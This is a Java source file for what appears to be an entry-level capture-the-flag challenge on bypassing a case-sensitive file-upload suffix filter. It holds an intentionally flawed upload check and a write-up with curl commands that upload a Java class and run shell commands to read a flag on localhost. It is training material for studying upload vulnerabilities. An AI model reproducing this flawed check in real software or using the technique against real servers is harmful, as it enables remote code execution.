package tum0r.server.problem.web.file_upload.filter.suffix;

import tum0r.model.ProblemInfoItem;
import tum0r.model.ProblemLevel;
import tum0r.server.problem.ProblemBase;
import tum0r.server.problem.web.file_upload.Exploit;
import tum0r.utils.extension.FileExtension;
import tum0r.utils.extension.StringExtension;
import tum0r.webengine.annotation.Param;
import tum0r.webengine.annotation.Server;
import tum0r.webengine.model.server.EngineFile;
import tum0r.webengine.model.server.ErrorMessage;
import tum0r.webengine.utils.server.action.Action;

/**
 * 工程: Security<br>
 * 包: tum0r.server.problem.web.file_upload.filter.suffix<br>
 * 创建者: tum0r<br>
 * 创建时间: 2021/6/26 13:37<br>
 * <br>
 */
@Server(Mapping = "/security/problem/web/file_upload/filter/case_filter")
public class CaseFilter extends ProblemBase {
    public CaseFilter() {
        information.ProblemTitle = "文件上传过滤——后缀大小写检测";
        information.ProblemID = 12;
        information.Creator = "tum0r";
        information.ProblemLevel = ProblemLevel.Entry;
        information.CreateTime = "2020/06/26";

        ProblemInfoItem problem = new ProblemInfoItem("upload", null);
        problem.addParameter("file", "File 上传的文件");
        information.ProblemInfo.add(problem);

        problem = new ProblemInfoItem("exploit", null);
        problem.addParameter("className", "String 上传的类名");
        problem.addParameter("payload", "String 命令");
        information.ProblemInfo.add(problem);
    }

    @Override
    public void description(Action<String> action) {
        action.callBack("""
                这只是一个过滤了后缀名的入门级别文件上传漏洞
                                
                上传的文件应是一个java文件，内容：
                public class exp {
                    public String exploit(String payload) {
                        return payload;
                    }
                }
                """);
    }

    @Override
    public void tips(Action<String> action) {
        action.callBack("file.setFileName(file.getFileName().toLowerCase());");
    }

    @Override
    public void writeUp(Action<String> action) {
        action.callBack("""
                1、上传文件
                curl -F "file=@exp.Java" http://127.0.0.1:59664/security/problem/web/file_upload/filter/case_filter/upload
                                
                2、执行命令获取目录
                curl -d "className=exp&payload=ls" http://127.0.0.1:59664/security/problem/web/file_upload/filter/case_filter/exploit
                                
                3、执行命令查看Flag文件夹下的内容，根据ProblemID获取flag
                curl -d "className=exp&payload=cat Flag/13.txt" http://127.0.0.1:59664/security/problem/web/file_upload/filter/case_filter/exploit
                """);
    }

    public void upload(@Param("file") EngineFile file, Action<String> action) throws ErrorMessage {
        action.check(file == null, "必须上传文件");
        String[] temp = FileExtension.getFileNameAndExtTrim(file.getFileName());
        action.check(StringExtension.isNullOrEmpty(temp[1]) || temp[1].equals("java"), "上传的文件不合法，后缀名不能为java");
        file.setFileName(file.getFileName().toLowerCase());
        new Exploit().upload(information.ProblemID, file, action);
    }

    public void exploit(@Param("className") String className, @Param("payload") String payload, Action<String> action) throws ErrorMessage {
        new Exploit().exp(information.ProblemID, className, payload, action);
    }
}
